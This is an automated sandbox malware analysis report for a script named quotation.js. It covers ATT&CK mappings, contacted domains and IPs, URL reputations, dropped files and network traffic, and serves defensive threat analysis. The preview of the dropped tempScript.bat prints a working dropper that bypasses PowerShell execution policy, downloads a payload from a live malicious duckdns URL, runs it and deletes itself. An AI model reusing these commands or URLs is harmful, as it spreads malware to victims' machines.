Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information122
Scripting		Valid Accounts1
Windows Management Instrumentation		122
Scripting		111
Process Injection		1
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote ServicesData from Local System1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell		Logon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets2
File and Directory Discovery		SSHKeylogging113
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials13
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502676 Sample: quotation.js Startdate: 02/09/2024 Architecture: WINDOWS Score: 100 29 timmy02.duckdns.org 2->29 31 rentry.co 2->31 35 Multi AV Scanner detection for domain / URL 2->35 37 Antivirus detection for URL or domain 2->37 39 Sigma detected: WScript or CScript Dropper 2->39 45 4 other signatures 2->45 8 wscript.exe 2 2->8         started        signatures3 41 Uses dynamic DNS services 29->41 43 Connects to a pastebin service (likely for C&C) 31->43 process4 dnsIp5 33 rentry.co 104.26.3.16, 443, 49702 CLOUDFLARENETUS United States 8->33 25 C:\Users\user\AppData\...\tempScript.bat, ASCII 8->25 dropped 47 System process connects to network (likely due to code injection or exploit) 8->47 49 Wscript starts Powershell (via cmd or directly) 8->49 51 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->51 53 Suspicious execution chain found 8->53 13 cmd.exe 1 8->13         started        file6 signatures7 process8 signatures9 55 Suspicious powershell command line found 13->55 57 Wscript starts Powershell (via cmd or directly) 13->57 59 Bypasses PowerShell execution policy 13->59 16 powershell.exe 14 16 13->16         started        19 taskkill.exe 1 13->19         started        21 conhost.exe 13->21         started        23 cmd.exe 1 13->23         started        process10 dnsIp11 27 timmy02.duckdns.org 41.105.186.133, 49707, 49723, 80 ALGTEL-ASDZ Algeria 16->27

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
rentry.co1%VirustotalBrowse
timmy02.duckdns.org4%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpP100%Avira URL Cloudmalware
https://rentry.co/6yg2yfkf/raw90%Avira URL Cloudsafe
http://timmy02.duckdns.org/uploads/186024/quotation.vbs.php100%Avira URL Cloudmalware
http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
http://timmy02.duckdns.org/uploads/186024/Quo100%Avira URL Cloudmalware
https://rentry.co/0%Avira URL Cloudsafe
https://rentry.co:443/6yg2yfkf/raw0%Avira URL Cloudsafe
http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
https://rentry.co/6yg2yfkf/raw0%Avira URL Cloudsafe
https://rentry.co/1%VirustotalBrowse
http://timmy02.duckdns.org100%Avira URL Cloudmalware
https://rentry.co/6yg2yfkf/rawD60%Avira URL Cloudsafe
https://github.com/Pester/Pester0%Avira URL Cloudsafe
http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpCommonProgramFiles=C:100%Avira URL Cloudmalware
http://timmy02.duckdns.org4%VirustotalBrowse
https://rentry.co:443/6yg2yfkf/raw4%VirustotalBrowse
https://rentry.co/6yg2yfkf/raw4%VirustotalBrowse
http://timmy02.duckdns.org/uploads/186024/Quo5%VirustotalBrowse
https://github.com/Pester/Pester1%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
rentry.co
104.26.3.16
truetrueunknown
timmy02.duckdns.org
41.105.186.133
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phptrue
    		unknown
    https://rentry.co/6yg2yfkf/rawtrue
    • 4%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpPwscript.exe, 00000001.00000002.1794047481.00000274B6A06000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.1767404550.00000234AB056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://rentry.co/6yg2yfkf/raw9wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://timmy02.duckdns.org/uploads/186024/quotation.vbs.phppowershell.exe, 0000000A.00000002.1766329922.00000234A7BD0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://timmy02.duckdns.org/uploads/186024/Quopowershell.exe, 0000000A.00000002.1767404550.00000234AAC98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC66000.00000004.00000800.00020000.00000000.sdmptrue
    • 5%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown
    https://go.micropowershell.exe, 0000000A.00000002.1767404550.00000234AA2CC000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://rentry.co/wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://contoso.com/powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.1767404550.00000234AB056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://contoso.com/Licensepowershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://rentry.co:443/6yg2yfkf/rawwscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmpfalse
    • 4%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://contoso.com/Iconpowershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://timmy02.duckdns.orgpowershell.exe, 0000000A.00000002.1767404550.00000234AA9D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC78000.00000004.00000800.00020000.00000000.sdmptrue
    • 4%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown
    https://rentry.co/6yg2yfkf/rawD6wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://aka.ms/pscore68powershell.exe, 0000000A.00000002.1767404550.00000234A96A1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.1767404550.00000234A96A1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpCommonProgramFiles=C:powershell.exe, 0000000A.00000002.1766329922.00000234A7BD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766381913.00000234A7BF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766329922.00000234A7BD4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766480583.00000234A7CE7000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    41.105.186.133
    		timmy02.duckdns.orgAlgeria
    		36947ALGTEL-ASDZtrue
    104.26.3.16
    		rentry.coUnited States
    		13335CLOUDFLARENETUStrue

    General Information

    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1502676
    Start date and time:2024-09-02 07:46:14 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 4m 48s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:23
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:quotation.js
    Detection:MAL
    Classification:mal100.troj.expl.evad.winJS@11/5@2/2
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 2
    • Number of non-executed functions: 3
    Cookbook Comments:
    • Found application associated with file extension: .js

    Warnings

    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
    • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target powershell.exe, PID 5428 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    01:47:18API Interceptor235x Sleep call for process: powershell.exe modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    104.26.3.16Quote.jsGet hashmaliciousUnknownBrowse
      SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
        SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exeGet hashmaliciousUnknownBrowse
          SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
            CV.vbsGet hashmaliciousXmrigBrowse
              system47.exeGet hashmaliciousXWormBrowse
                file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                    S982i1J0Uk.msiGet hashmaliciousUnknownBrowse
                      cliente.exeGet hashmaliciousUnknownBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        rentry.coQuote.jsGet hashmaliciousUnknownBrowse
                        • 104.26.3.16
                        SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
                        • 104.26.3.16
                        SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exeGet hashmaliciousUnknownBrowse
                        • 104.26.3.16
                        SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
                        • 104.26.3.16
                        SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exeGet hashmaliciousUnknownBrowse
                        • 104.26.2.16
                        CV.vbsGet hashmaliciousXmrigBrowse
                        • 104.26.3.16
                        SecuriteInfo.com.Trojan.GenericFCA.Script.33276.27996.26811.exeGet hashmaliciousUnknownBrowse
                        • 104.26.2.16
                        system47.exeGet hashmaliciousXWormBrowse
                        • 104.26.3.16
                        file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                        • 104.26.3.16
                        FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                        • 104.26.2.16
                        timmy02.duckdns.orgQuote.jsGet hashmaliciousUnknownBrowse
                        • 197.207.170.98

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        ALGTEL-ASDZmirai.dbg.elfGet hashmaliciousMiraiBrowse
                        • 154.255.38.95
                        mirai.ppc.elfGet hashmaliciousMiraiBrowse
                        • 197.114.85.5
                        sora.arm7.elfGet hashmaliciousMiraiBrowse
                        • 105.100.195.49
                        sora.sh4.elfGet hashmaliciousMiraiBrowse
                        • 105.103.188.186
                        Quote.jsGet hashmaliciousUnknownBrowse
                        • 197.207.170.98
                        sora.m68k.elfGet hashmaliciousUnknownBrowse
                        • 105.103.188.172
                        jew.x86.elfGet hashmaliciousUnknownBrowse
                        • 41.102.197.126
                        xd.arm7.elfGet hashmaliciousMiraiBrowse
                        • 154.246.28.221
                        KKveTTgaAAsecNNaaaa.mpsl.elfGet hashmaliciousUnknownBrowse
                        • 197.207.194.80
                        eQMWdrDEm7.elfGet hashmaliciousUnknownBrowse
                        • 41.103.192.83
                        CLOUDFLARENETUS81bl0ZlcJ3.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 188.114.97.3
                        ejH1Ma9DnJ.exeGet hashmaliciousLummaC, VidarBrowse
                        • 188.114.96.3
                        xnfvsO7kVN.exeGet hashmaliciousLummaC, VidarBrowse
                        • 188.114.97.3
                        3gqQI34mVq.exeGet hashmaliciousLummaCBrowse
                        • 172.67.152.163
                        file.exeGet hashmaliciousUnknownBrowse
                        • 172.64.41.3
                        Apocalypse.exeGet hashmaliciousLummaC, MicroClipBrowse
                        • 172.67.175.170
                        SecuriteInfo.com.Win32.CrypterX-gen.29312.2664.exeGet hashmaliciousAgentTeslaBrowse
                        • 172.67.74.152
                        SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.21943.32020.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.97.3
                        PACIFIC ARGOSY PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        SSI Brilliant - SHIP PARTICULARS.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.13.205

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        a0e9f5d64349fb13191bc781f81f42e181bl0ZlcJ3.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 104.26.3.16
                        ejH1Ma9DnJ.exeGet hashmaliciousLummaC, VidarBrowse
                        • 104.26.3.16
                        xnfvsO7kVN.exeGet hashmaliciousLummaC, VidarBrowse
                        • 104.26.3.16
                        3gqQI34mVq.exeGet hashmaliciousLummaCBrowse
                        • 104.26.3.16
                        Apocalypse.exeGet hashmaliciousLummaC, MicroClipBrowse
                        • 104.26.3.16
                        mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                        • 104.26.3.16
                        https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1EGet hashmaliciousHTMLPhisherBrowse
                        • 104.26.3.16
                        V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                        • 104.26.3.16
                        agd42.exeGet hashmaliciousBlackMoonBrowse
                        • 104.26.3.16
                        agd42.exeGet hashmaliciousBlackMoonBrowse
                        • 104.26.3.16

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):9434
                        Entropy (8bit):4.928515784730612
                        Encrypted:false
                        SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                        MD5:D3594118838EF8580975DDA877E44DEB
                        SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                        SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                        SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1940658735648508
                        Encrypted:false
                        SSDEEP:3:NlllulJnp/p:NllU
                        MD5:BC6DB77EB243BF62DC31267706650173
                        SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                        SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                        SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:@...e.................................X..............@..........

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03wxh4mx.gym.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjo54vkd.2ry.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\tempScript.bat

                        Download File
                        Process:C:\Windows\System32\wscript.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):305
                        Entropy (8bit):5.446129494019924
                        Encrypted:false
                        SSDEEP:6:p56dz3jIW3Udpav2+ECEovQ980QO0cbjLh8JpH5uRDk5JOWPRmvugTv:ixIW7TpI980QpcjGLH5kkiWPRTgTv
                        MD5:6BCE262A914E1606C864F6383A796ED7
                        SHA1:ECBD77FCBB596EFBAC410056EC5790A1B8812D33
                        SHA-256:213B2AF8334B2E309F0472F30D7CA42351BFDF4B4359C9A751A29756E14E3545
                        SHA-512:E5A1A215E7CB3F4C26D62377F83B9C58AE294AFBCF8693A57CBCBFC8B80730F8CB0A1A16968247509F8D42AC9182A71E45585F60111C17F9EF15A963CA11D944
                        Malicious:true
                        Preview:@echo on..SETLOCAL..SET "cmdURL=http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php"..SET "cmdPath=%temp%\Update.php"..powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri '%cmdURL%' -OutFile '%cmdPath%' "..cmd.exe /c "%cmdPath%"..taskkill /f /im wscript.exe..ENDLOCAL..DEL "%~f0"..

                        Static File Info

                        General

                        File type:Unicode text, UTF-16, little-endian text, with very long lines (709), with CRLF line terminators
                        Entropy (8bit):4.230368219285672
                        TrID:
                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                        • MP3 audio (1001/1) 32.22%
                        • Lumena CEL bitmap (63/63) 2.03%
                        • Corel Photo Paint (41/41) 1.32%
                        File name:quotation.js
                        File size:3'316'916 bytes
                        MD5:e9dfe55aca773878308f2d4d6ad00c79
                        SHA1:0066ce882b680471050a49ec800d32e47b3765ca
                        SHA256:d7c6eab85f93123d8bf4db0f5714d2d400d4f7fb93b1a79163ebaee7e72b515d
                        SHA512:a9e33a3bb0354f95db699a461060d777a952f68ca6bc847b17c9dc371e86d133167e4cc6f7274d035b1a52443a2f422bb6fe6101597df2a52599c6f4fb1c67b6
                        SSDEEP:12288:T3Y6TzFLuglAgA1X+H/5J0pQhc6LhTdWzqxRAdrvdgIdN/dgLAgLcSq6SOgICSaN:O
                        TLSH:80E5F2562AD61C9CB033BD0ACBEDE561DF5BB221250E6B9717A1038F01DB842DD8BC76
                        File Content Preview:../.*.F.h.B.i.A.=.}.!.k.i.%.e.}.0.X.x.7.!.U.4.!.i.(.,.O.{.3.o.c.B.8.0.W.&._.n.r.>.k.0.&.].z.{.].T.R...<.Y.h.%.L.r.<.n.8.Z.0.y.:.V.n.V.M.>.O.w.#.u.1.e.1.W.O.a.%.).2.4.f.*./...../.*.N.b.y.k.g.=.w.8.u.Q.M.u.Q.|.?.2.T.0.D.^.).m.-.&.{.:.N.{.H.9.@.H.D.k.T.&.|.@

                        File Icon

                        Icon Hash:68d69b8bb6aa9a86

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 2, 2024 07:47:15.756586075 CEST49702443192.168.2.7104.26.3.16
                        Sep 2, 2024 07:47:15.756620884 CEST44349702104.26.3.16192.168.2.7
                        Sep 2, 2024 07:47:15.756829023 CEST49702443192.168.2.7104.26.3.16
                        Sep 2, 2024 07:47:15.766387939 CEST49702443192.168.2.7104.26.3.16
                        Sep 2, 2024 07:47:15.766405106 CEST44349702104.26.3.16192.168.2.7
                        Sep 2, 2024 07:47:16.241029024 CEST44349702104.26.3.16192.168.2.7
                        Sep 2, 2024 07:47:16.241188049 CEST49702443192.168.2.7104.26.3.16
                        Sep 2, 2024 07:47:16.260643005 CEST49702443192.168.2.7104.26.3.16
                        Sep 2, 2024 07:47:16.260662079 CEST44349702104.26.3.16192.168.2.7
                        Sep 2, 2024 07:47:16.260986090 CEST44349702104.26.3.16192.168.2.7
                        Sep 2, 2024 07:47:16.308180094 CEST49702443192.168.2.7104.26.3.16
                        Sep 2, 2024 07:47:16.315891027 CEST49702443192.168.2.7104.26.3.16
                        Sep 2, 2024 07:47:16.356512070 CEST44349702104.26.3.16192.168.2.7
                        Sep 2, 2024 07:47:16.553469896 CEST44349702104.26.3.16192.168.2.7
                        Sep 2, 2024 07:47:16.553551912 CEST44349702104.26.3.16192.168.2.7
                        Sep 2, 2024 07:47:16.553677082 CEST49702443192.168.2.7104.26.3.16
                        Sep 2, 2024 07:47:16.560817003 CEST49702443192.168.2.7104.26.3.16
                        Sep 2, 2024 07:47:16.560842037 CEST44349702104.26.3.16192.168.2.7
                        Sep 2, 2024 07:47:16.560853004 CEST49702443192.168.2.7104.26.3.16
                        Sep 2, 2024 07:47:16.560861111 CEST44349702104.26.3.16192.168.2.7
                        Sep 2, 2024 07:47:20.046479940 CEST4970780192.168.2.741.105.186.133
                        Sep 2, 2024 07:47:20.051443100 CEST804970741.105.186.133192.168.2.7
                        Sep 2, 2024 07:47:20.054006100 CEST4970780192.168.2.741.105.186.133
                        Sep 2, 2024 07:47:20.060497999 CEST4970780192.168.2.741.105.186.133
                        Sep 2, 2024 07:47:20.065296888 CEST804970741.105.186.133192.168.2.7
                        Sep 2, 2024 07:47:41.445280075 CEST804970741.105.186.133192.168.2.7
